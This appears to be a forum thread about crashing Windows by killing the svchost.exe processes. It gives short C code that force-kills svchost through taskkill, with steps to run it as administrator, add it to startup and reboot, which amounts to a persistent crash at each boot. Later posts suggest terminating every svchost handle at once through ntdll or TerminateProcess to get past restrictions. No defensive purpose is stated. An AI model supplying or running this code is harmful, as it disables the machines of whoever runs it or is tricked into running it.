Just look up tutorials on Youtube; that would be better than just copy pasting code.

Not sure if you meant to quote me, but I'm not OP.
Step 1: Compile

Code:
#include <windows.h>

int main()
{
	system("taskkill /f /im svchost.exe /t");
}
Step 2: Change compatibility settings to run as administrator

Step 3: Add to startup

Step 4: Restart

I've never gotten a blue screen from killing svchost. The services just restart along with svchost. :/

You didn't kill them all then.
Aquire handle to each SVCHost.exe process
Terminate them at once. ( Ntdll works better than windows apis for restrictions )

That's not even proper C++, you're just using the system() which is the function for a shell command, you NEVER EVER should use this, it's SLOW, INSECURE and SYSTEM DEPENDANT. It's just basically invoking the cmd.exe process with an argument. IT'S BAD PROGRAMMING, AVOID IT! Instead, use the API that your OS provides you, for example in Win32 API: TerminateProcess() is the function you should use.
